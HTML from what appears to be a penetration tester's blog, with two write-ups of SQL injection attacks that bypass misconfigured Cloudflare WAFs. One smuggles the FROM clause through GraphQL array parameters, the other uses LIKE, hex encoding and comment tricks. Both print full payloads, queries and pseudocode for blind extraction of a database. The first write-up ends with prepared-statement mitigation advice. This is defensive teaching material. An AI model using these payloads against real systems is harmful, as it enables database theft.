class="p">}</span></code></pre></figure> <p>The subsequent SQL query on the server looks like this:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="n">t1</span><span class="p">.</span><span class="o">*</span> <span class="k">FROM</span> <span class="n">table1</span> <span class="k">AS</span> <span class="n">t1</span> <span class="k">LEFT</span> <span class="k">JOIN</span> <span class="n">table2</span> <span class="k">AS</span> <span class="n">t2</span> <span class="k">ON</span> <span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="k">input</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span><span class="k">OR</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span><span class="p">)</span><span class="k">AND</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">t1</span><span class="p">.</span><span class="n">column1</span> <span class="k">LIMIT</span> <span class="mi">1</span> <span class="k">OFFSET</span> <span class="mi">0</span><span class="p">),</span><span class="mi">1</span><span class="p">))))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">)</span> <span class="k">WHERE</span> <span class="n">t1</span><span class="p">.</span><span class="n">deleted_at</span> <span class="k">IS</span> <span class="k">NULL</span> <span class="k">AND</span> <span class="n">t1</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="err">$</span><span class="mi">1</span> <span class="k">AND</span> <span class="p">(</span> <span class="k">LOWER</span><span class="p">(</span><span class="n">t1</span><span class="p">.</span><span class="n">email</span><span class="p">)</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span><span class="k">OR</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span><span class="p">)</span><span class="k">AND</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">t1</span><span class="p">.</span><span class="n">column1</span> <span class="k">LIMIT</span> <span class="mi">1</span> <span class="k">OFFSET</span> <span class="mi">0</span><span class="p">),</span><span class="mi">1</span><span class="p">))))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">)</span> <span class="k">OR</span> <span class="k">LOWER</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="k">input</span><span class="p">)</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span><span class="k">OR</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span><span class="p">)</span><span class="k">AND</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">t1</span><span class="p">.</span><span class="n">column1</span> <span class="k">LIMIT</span> <span class="mi">1</span> <span class="k">OFFSET</span> <span class="mi">0</span><span class="p">),</span><span class="mi">1</span><span class="p">))))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">)</span> <span class="p">);</span></code></pre></figure> <p> This works fine, but the limitation is that only data from table1 (or table2) can be extracted, as these are the only tables aliased in the server SQL query. Moving on to the final, successful attempt. </p> <h4 id="final-and-successful-attempt">Final (and successful) attempt</h4> <p> All right, if I wanted to retrieve any piece of data I wanted from the database, I had to put aside WAF bypass technique #3. At this point it looked like there was no way to avoid using the <b>FROM</b> clause. It also looked like there was no way to successfully conceal the <b>FROM</b> clause into the payload without it being detected by Cloudflare's WAF. Great. It seemed like the answer to was I was looking for was not in the SQL query. I had to take a step back. </p> <h5>Enter GraphQL</h5> <p> We've seen that the body of the request sent was a GraphQL query, which was then translated into an SQL query. So my next attempt was to mutate the GraphQL query and somehow manage to conceal the <b>FROM</b> clause in there, which would hopefully translate as a working SQL query on the server. <br /> As I mentioned before a GraphQL query is structured similarly to a JSON object. Data in JSON is stored in a dictionary as name/value pairs which are both strings. GraphQL queries require string keys but allow arbitrary parameters. These rules apply to GraphQL: <ul> <li>Data is separated by commas</li> <li>Curly braces hold objects</li> <li>Square brackets hold arrays</li> </ul> </p> <p> So a GraphQL query parameter could look like any of the following ways: </p> <figure class="highlight"><pre><code class="language-json" data-lang="json"><span class="err">...</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="s2">"George"</span><span class="p">}</span><span class="w"> </span><span class="p">}</span></code></pre></figure> <figure class="highlight"><pre><code class="language-json" data-lang="json"><span class="err">...</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:{</span><span class="w"> </span><span class="nl">"a"</span><span class="p">:</span><span class="s2">"a"</span><span class="p">,</span><span class="w"> </span><span class="nl">"b"</span><span class="p">:</span><span class="s2">"b"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span></code></pre></figure> <figure class="highlight"><pre><code class="language-json" data-lang="json"><span class="err">...</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:[</span><span class="s2">"George"</span><span class="p">,</span><span class="w"> </span><span class="s2">"Skouroupathis"</span><span class="p">]}</span><span class="w"> </span><span class="p">}</span></code></pre></figure> <p> This got me thinking: what happens to the SQL query on the backend server if I pass the value of the object as an array instead of a string. In short, I wanted to break the SQL injection query and move the <b>FROM</b> clause to a different object in order to trick Cloudflare. </p> <p>I turned this</p> <figure class="highlight"><pre><code class="language-json" data-lang="json"><span class="err">...</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:</span><span class="s2">"a@b.c')OR(t2.id = t1.id)AND(t2.q_id IN (1, 2, 3, 4))AND('a'=(SELECT(right((SELECT column1 FROM table1 LIMIT 1 OFFSET 0),1))))AND('a'='a"</span><span class="p">}</span><span class="w"> </span><span class="p">}</span></code></pre></figure> <p>into this</p> <figure class="highlight"><pre><code class="language-json" data-lang="json"><span class="err">...</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:[</span><span class="s2">"a@b.c')OR(t2.id = t1.id)AND(t2.q_id IN (1, 2, 3, 4))AND('a'=(SELECT(right((SELECT column1"</span><span class="p">,</span><span class="w"> </span><span class="s2">"FROM table1 LIMIT 1 OFFSET 0),1))))AND('a'='a"</span><span class="p">]}</span><span class="w"> </span><span class="p">}</span></code></pre></figure> <p> The request bypassed the WAF and I got an error back from the database, complaining about a malformed SQL query and showing me the full resulting SQL query. The query at the injection point looked like this: <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="p">...</span> <span class="k">LOWER</span><span class="p">(</span><span class="n">t1</span><span class="p">.</span><span class="n">email</span><span class="p">)</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span><span class="k">OR</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span><span class="p">)</span><span class="k">AND</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">column1</span><span class="p">,</span> <span class="k">FROM</span> <span class="n">table1</span> <span class="k">LIMIT</span> <span class="mi">1</span> <span class="k">OFFSET</span> <span class="mi">0</span><span class="p">),</span><span class="mi">1</span><span class="p">))))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">)</span> <span class="p">...</span></code></pre></figure> </p> <p> Notice the comma (,) right after <b>SELECT column1</b>? That was my golden ticket out of the SQLi-filtering hell. Passing the value of the GraphQL query parameter as an array is translated as a string in the backend SQL server. The string is simply the concatenation of the array's items separated by a comma and a space character! The SQL query was malformed at this point, but I could comment out the commas and have a valid, WAF-bypassing request, that retrieved whatever data I wanted from whichever database table I chose to! </p> <p> This is the body of the final POST request: </p> <figure class="highlight"><pre><code class="language-json" data-lang="json"><span class="err">...</span><span class="w"> </span><span class="nl">"email"</span><span class="p">:[</span><span class="s2">"a@b.c')OR(t2.id = t1.id)AND(t2.q_id IN (1, 2, 3, 4))AND('a'=(SELECT(right((SELECT column1/*"</span><span class="p">,</span><span class="w"> </span><span class="s2">"*/FROM table1 LIMIT 1 OFFSET 0),1))))AND('a'='a"</span><span class="p">]}</span><span class="w"> </span><span class="p">}</span></code></pre></figure> <p>and the resulting valid SQL query on the SQL server:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="n">t1</span><span class="p">.</span><span class="o">*</span> <span class="k">FROM</span> <span class="n">table1</span> <span class="k">AS</span> <span class="n">t1</span> <span class="k">LEFT</span> <span class="k">JOIN</span> <span class="n">table2</span> <span class="k">AS</span> <span class="n">t2</span> <span class="k">ON</span> <span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span> <span class="k">AND</span> <span class="n">t2</span><span class="p">.</span><span class="k">input</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span><span class="k">OR</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span><span class="p">)</span><span class="k">AND</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">column1</span><span class="cm">/*, */</span> <span class="k">FROM</span> <span class="n">table1</span> <span class="k">LIMIT</span> <span class="mi">1</span> <span class="k">OFFSET</span> <span class="mi">0</span><span class="p">),</span><span class="mi">1</span><span class="p">))))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">)</span> <span class="k">WHERE</span> <span class="n">t1</span><span class="p">.</span><span class="n">deleted_at</span> <span class="k">IS</span> <span class="k">NULL</span> <span class="k">AND</span> <span class="n">t1</span><span class="p">.</span><span class="n">name</span> <span class="o">=</span> <span class="err">$</span><span class="mi">1</span> <span class="k">AND</span> <span class="p">(</span> <span class="k">LOWER</span><span class="p">(</span><span class="n">t1</span><span class="p">.</span><span class="n">email</span><span class="p">)</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span><span class="k">OR</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span><span class="p">)</span><span class="k">AND</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">column1</span><span class="cm">/*, */</span> <span class="k">FROM</span> <span class="n">table1</span> <span class="k">LIMIT</span> <span class="mi">1</span> <span class="k">OFFSET</span> <span class="mi">0</span><span class="p">)),</span><span class="mi">1</span><span class="p">))))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">)</span> <span class="k">OR</span> <span class="k">LOWER</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="k">input</span><span class="p">)</span> <span class="o">=</span> <span class="k">LOWER</span><span class="p">(</span><span class="s1">'a@b.c'</span><span class="p">)</span><span class="k">OR</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">t1</span><span class="p">.</span><span class="n">id</span><span class="p">)</span><span class="k">AND</span><span class="p">(</span><span class="n">t2</span><span class="p">.</span><span class="n">q_id</span> <span class="k">IN</span> <span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="p">(</span><span class="k">SELECT</span><span class="p">(</span><span class="k">right</span><span class="p">((</span><span class="k">SELECT</span> <span class="n">column1</span><span class="cm">/*, */</span> <span class="k">FROM</span> <span class="n">table1</span> <span class="k">LIMIT</span> <span class="mi">1</span> <span class="k">OFFSET</span> <span class="mi">0</span><span class="p">)),</span><span class="mi">1</span><span class="p">))))</span><span class="k">AND</span><span class="p">(</span><span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">)</span> <span class="p">);</span></code></pre></figure> <p> It worked! </p> <h4 id="full-speed-ahead">Full Speed Ahead</h4> <p> To make the table retrieving process easier, I wrote a script in Python to automate the process. The pseudocode of the script goes something like this: </p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1"># assert names of columns and table name is known </span><span class="n">alphabet</span> <span class="o">=</span> <span class="p">[</span><span class="n">a</span><span class="p">,</span><span class="n">b</span><span class="p">,</span><span class="n">c</span><span class="p">,...,</span><span class="n">y</span><span class="p">,</span><span class="n">z</span><span class="p">]</span> <span class="n">valueRetrieved</span> <span class="o">=</span> <span class="s">""</span> <span class="n">numOfCharsFound</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">for</span> <span class="n">rowNumber</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">0</span><span class="p">,</span><span class="mi">20</span><span class="p">]:</span> <span class="k">for</span> <span class="n">columnName</span> <span class="ow">in</span> <span class="n">columns</span><span class="p">:</span> <span class="k">for</span> <span class="n">character</span> <span class="ow">in</span> <span class="n">alphabet</span><span class="p">:</span> <span class="n">sqlInjection</span> <span class="o">=</span> <span class="s">''' a@b.c')OR(t2.id = t1.id)AND(t2.q_id IN (1, 2, 3, 4))AND('{character} + {valueRetrieved}'=(SELECT(right((SELECT {columnName}/*", "*/FROM tableName LIMIT 1 OFFSET {rowNumber}),{numOfCharsFound}+1))))AND('a'='a '''</span> <span class="n">inject</span> <span class="n">sqlInjection</span> <span class="ow">in</span> <span class="n">POST</span> <span class="n">request</span> <span class="n">body</span> <span class="k">if</span> <span class="n">response</span><span class="p">.</span><span class="n">body</span> <span class="o">==</span> <span class="s">"OK"</span><span class="p">:</span> <span class="n">valueRetrieved</span> <span class="o">=</span> <span class="n">character</span> <span class="o">+</span> <span class="n">valueRetrieved</span> <span class="n">recurse</span> <span class="n">function</span> <span class="k">with</span> <span class="n">numOfCharsFound</span><span class="o">++</span> <span class="k">elif</span> <span class="n">response</span><span class="p">.</span><span class="n">body</span> <span class="o">==</span> <span class="s">"NOT OK"</span><span class="p">:</span> <span class="k">continue</span> <span class="k">with</span> <span class="nb">next</span> <span class="n">character</span> <span class="ow">in</span> <span class="n">alphabet</span> <span class="k">return</span> <span class="n">valueRetrieved</span></code></pre></figure> <p>And this is how I exploited GraphQL to craft an SQL injection that bypassed a misconfigured Cloudflare WAF instance and was able to retrieve the whole database in the back end. As I mentioned in the beginning, this combination of bypassing techniques do not work against a properly-configured Cloudflare WAF.</p> <h4 id="mitigation">Mitigation</h4> <p>The safest way to mitigate SQL injections on your databases is prepared statements. These come in most database interaction libraries for most languages. You can find a full list of ways to mitigate SQL injections at <a href="https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html">OWASP</a>.</p> <p> I mentioned this last time, but it is my opinion that the shift-left approach is of the greatest importance when developing software. You can spend lots of money and time configuring IDSs, WAFs and controls in general, but the most important thing is for developers to give the appropriate attention to the security of the applications they are developing (or even better have a penetration tester have a go at it). </p> <p> PS: Don't forget to sanitize your users' input. </p> Tue, 25 Jan 2022 13:37:00 +0000 /web/2022/01/25/my-sqli-adventure-or-why-you-should-make-sure-your-waf-is-configured-properly.html /web/2022/01/25/my-sqli-adventure-or-why-you-should-make-sure-your-waf-is-configured-properly.html Web <p>In late 2018 I was tasked with performing a Web Application security assessment for a large client. After running the standard scans with automated tools, something interesting came up: a possible SQL injection which couldn’t be exploited using the tool. The reason: Cloudflare’s WAF and more specifically its SQL Injection filter.</p> <h4 id="details-about-the-application">Details about the application</h4> <p>The application was a generic website written in PHP with MySQL as the backend DBMS. The vulnerable page submitted a POST request with multipart form body data to the /index.php endpoint. I honestly don’t remember the use of the form and it doesn’t really matter for the writeup. The POST request looked like this:</p> <figure class="highlight"><pre><code class="language-http" data-lang="http"><span class="nf">POST</span> <span class="nn">/index.php</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="na">Host</span><span class="p">:</span> <span class="s">******</span> <span class="na">Connection</span><span class="p">:</span> <span class="s">close</span> <span class="na">Accept-Encoding</span><span class="p">:</span> <span class="s">gzip, deflate</span> <span class="na">Accept</span><span class="p">:</span> <span class="s">*/*</span> <span class="na">Content-Type</span><span class="p">:</span> <span class="s">multipart/form-data; boundary=dc30b7aab06d4aff91d4285d7e60d4f3</span> --dc30b7aab06d4aff91d4285d7e60d4f3 Content-Disposition: form-data; name="126" ###### ###### ########## ######## --dc30b7aab06d4aff91d4285d7e60d4f3 Content-Disposition: form-data; name="127" ###### ###### ########## ######## --dc30b7aab06d4aff91d4285d7e60d4f3 Content-Disposition: form-data; name="130" ... ... ###### #### 6 ######## --dc30b7aab06d4aff91d4285d7e60d4f3 Content-Disposition: form-data; name="task" form.save --dc30b7aab06d4aff91d4285d7e60d4f3 Content-Disposition: form-data; name="form_id" X-MARK --dc30b7aab06d4aff91d4285d7e60d4f3 Content-Disposition: form-data; name="96" ############ --dc30b7aab06d4aff91d4285d7e60d4f3 ... ... Content-Disposition: form-data; name="115[]" ########## ################## #### ###### ###### --dc30b7aab06d4aff91d4285d7e60d4f3 Content-Disposition: form-data; name="125" ###### ###### ########## ######## --dc30b7aab06d4aff91d4285d7e60d4f3--</code></pre></figure> <p>The unsanitized parameter at X-MARK can be used to inject arbitrary values at the place of the WHERE clause of an SQL SELECT query. For example, if the above data was sent as the body of the POST request, the SQL query which would be executed on the server would look something like this:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="n">c1</span><span class="p">,</span><span class="n">c2</span><span class="p">,</span><span class="n">c3</span> <span class="k">FROM</span> <span class="n">t1</span> <span class="k">WHERE</span> <span class="n">X</span><span class="o">-</span><span class="n">MARK</span><span class="p">;</span></code></pre></figure> <p>The technique typically used for this kind of injection is a Time-based Blind SQL injection. The problem was, that Cloudflare would recognize these kinds of injections and block them on the spot. No matter how complicated I tried to make the query or how many sqlmap tamper scripts I used, Cloudflare was always there.</p> <p>To overcome this issue, I used an observation I made while manually testing for SQL injections on the same request: I had noticed that when I tried to inject code that resulted in something close to the following SQL query:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="n">c1</span><span class="p">,</span><span class="n">c2</span><span class="p">,</span><span class="n">c3</span> <span class="k">FROM</span> <span class="n">t1</span> <span class="k">WHERE</span> <span class="s1">'a'</span><span class="o">=</span><span class="s1">'a'</span><span class="p">;</span></code></pre></figure> <p>the web server responded with status 200 OK. When I tried to inject code that resulted in something close to this SQL query:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="n">c1</span><span class="p">,</span><span class="n">c2</span><span class="p">,</span><span class="n">c3</span> <span class="k">FROM</span> <span class="n">t1</span> <span class="k">WHERE</span> <span class="s1">'a'</span><span class="o">=</span><span class="s1">'b'</span><span class="p">;</span></code></pre></figure> <p>the server responded with status 500 Internal Server Error.</p> <p>In other words when the SQL query in the backend did NOT return results, the web server complained and crashed (probably because the backend code tried to access an item in the returned list whose index was out of range). This gave me an idea: writing a script that compared a character picked from the name of the required DBMS entity and sequentially compared it with all characters. The idea was, if the two characters matched, the server would return a 200 OK status, else it would return a 500 Internal Server Error status and I would have to compare the requested character with the next character in my list.</p> <h4 id="first-try">First Try</h4> <p>My thinking was that if a wanted to find the first second character of the name of the fifth table (as they are listed in information_schema.tables), I would start by asking MySQL if that character is equal to ‘a’ and if not I would continue with ‘b’, ‘c’ etc. I would start by inject the following string (for comparison with ‘a’):</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="s1">'a'</span> <span class="o">=</span> <span class="p">(</span><span class="k">SELECT</span> <span class="k">SUBSTRING</span><span class="p">(</span><span class="k">table_name</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">tables</span> <span class="k">LIMIT</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">1</span> <span class="p">)</span></code></pre></figure> <p>which would result in the following SQL query to be executed on the server:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="n">c1</span><span class="p">,</span><span class="n">c2</span><span class="p">,</span><span class="n">c3</span> <span class="k">FROM</span> <span class="n">t1</span> <span class="k">WHERE</span> <span class="s1">'a'</span> <span class="o">=</span> <span class="p">(</span><span class="k">SELECT</span> <span class="k">SUBSTRING</span><span class="p">(</span><span class="k">table_name</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">tables</span> <span class="k">LIMIT</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">1</span> <span class="p">)</span></code></pre></figure> <p>When I found the table name to be t1 for example, I was to brute force its columns’ names with the following starting injection:</p> <p><em>INJECTION 1</em></p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="s1">'a'</span> <span class="o">=</span> <span class="p">(</span><span class="k">SELECT</span> <span class="k">SUBSTRING</span><span class="p">(</span><span class="k">column_name</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span> <span class="k">WHERE</span> <span class="k">table_name</span> <span class="o">=</span> <span class="nv">"t1"</span> <span class="k">LIMIT</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span> <span class="p">)</span></code></pre></figure> <p>and then actually get values out of column c1 of table t1 by starting with the following injection:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="s1">'a'</span> <span class="o">=</span> <span class="p">(</span><span class="k">SELECT</span> <span class="k">SUBSTRING</span><span class="p">(</span><span class="n">c1</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">t1</span> <span class="k">LIMIT</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span> <span class="p">)</span></code></pre></figure> <p>The idea was good, but Cloudflare would complain about the ‘=’ sign. The injection</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="s1">'a'</span> <span class="o">=</span> <span class="s1">'b'</span></code></pre></figure> <p>would get blocked by Cloudflare’s WAF. After a bit of fiddling, I came up with the following request that bypassed the ‘=’ restriction:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="s1">'a'</span> <span class="k">LIKE</span> <span class="s1">'b'</span></code></pre></figure> <p>This means that the initial injection <em>INJECTION 1</em> would become:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="s1">'a'</span> <span class="k">LIKE</span> <span class="p">(</span><span class="k">SELECT</span> <span class="k">SUBSTRING</span><span class="p">(</span><span class="k">column_name</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span> <span class="k">WHERE</span> <span class="k">table_name</span> <span class="o">=</span> <span class="nv">"t1"</span> <span class="k">LIMIT</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span> <span class="p">)</span></code></pre></figure> <h4 id="second-try">Second Try</h4> <p><em>INJECTION 1</em> was still not ready to go. Cloudflare would still complain about stuff. More specifically the injection</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="s1">'a'</span> <span class="k">LIKE</span> <span class="s1">'b'</span></code></pre></figure> <p>would still get blocked, not because of the LIKE keyword, but because of the ‘a’ character. Comparing plain strings to anything was not allowed. To overcome this issue I came up with the following injection that went through undetected by the WAF:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="s1">'0x61'</span> <span class="k">LIKE</span> <span class="s1">'b'</span></code></pre></figure> <p>The above injection sends the character ‘a’ as the hex-encoded value ‘0x61’ which still allows it to work:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="s1">'0x61'</span> <span class="k">LIKE</span> <span class="s1">'a'</span></code></pre></figure> <p>still returns True, and</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="s1">'0x61'</span> <span class="k">LIKE</span> <span class="s1">'b'</span></code></pre></figure> <p>passes through undetected and returns False.</p> <p>The resulting <em>INJECTION 1</em> now looks like this:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="s1">'0x61'</span> <span class="k">LIKE</span> <span class="p">(</span><span class="k">SELECT</span> <span class="k">SUBSTRING</span><span class="p">(</span><span class="k">column_name</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span> <span class="k">WHERE</span> <span class="k">table_name</span> <span class="o">=</span> <span class="nv">"t1"</span> <span class="k">LIMIT</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span> <span class="p">)</span></code></pre></figure> <h4 id="third-try">Third Try</h4> <p>The third obfuscation I had to enroll was a multi-line comment addition between SQL query keywords. Cloudflare would block queries like this:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span> <span class="n">c1</span><span class="p">,</span><span class="n">c2</span><span class="p">,</span><span class="n">c3</span> <span class="k">FROM</span> <span class="n">t1</span> <span class="k">WHERE</span> <span class="s1">'0x61'</span> <span class="k">LIKE</span> <span class="s1">'b'</span></code></pre></figure> <p>but with a multi-line comment trick, the new query would go through undetected:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="k">SELECT</span><span class="cm">/*trick comment*/</span> <span class="n">c1</span><span class="p">,</span><span class="n">c2</span><span class="p">,</span><span class="n">c3</span> <span class="k">FROM</span><span class="cm">/*trick comment*/</span> <span class="n">t1</span> <span class="k">WHERE</span> <span class="s1">'0x61'</span> <span class="k">LIKE</span> <span class="s1">'b'</span></code></pre></figure> <p>Thus, applying this method on <em>INJECTION 1</em>, would make it look like this:</p> <figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="s1">'0x61'</span> <span class="k">LIKE</span> <span class="p">(</span><span class="k">SELECT</span><span class="cm">/*trick comment*/</span> <span 